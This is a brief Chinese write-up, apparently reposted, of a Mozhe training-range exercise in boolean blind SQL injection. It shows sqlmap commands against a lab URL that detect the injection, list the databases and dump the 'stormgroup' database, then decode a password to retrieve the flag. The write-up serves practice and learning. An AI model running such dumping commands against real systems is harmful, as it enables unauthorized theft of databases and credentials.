墨者靶场 SQL注入漏洞测试(布尔盲注)
Posted 曹振国cc
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了墨者靶场 SQL注入漏洞测试(布尔盲注)相关的知识,希望对你有一定的参考价值。
初级 布尔盲注
一、查看页面源代码,发现注入点
二、sqlmap一把梭
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1
查询库
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 --dbs
输出全部数据
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 -D stormgroup --dump
解码 status=1 的密码
三、登录查看到key
以上是关于墨者靶场 SQL注入漏洞测试(布尔盲注)的主要内容,如果未能解决你的问题,请参考以下文章
墨者靶场 SQL手工注入漏洞测试(MySQL数据库-字符型)
墨者靶场 SQL手工注入漏洞测试(MySQL数据库-字符型)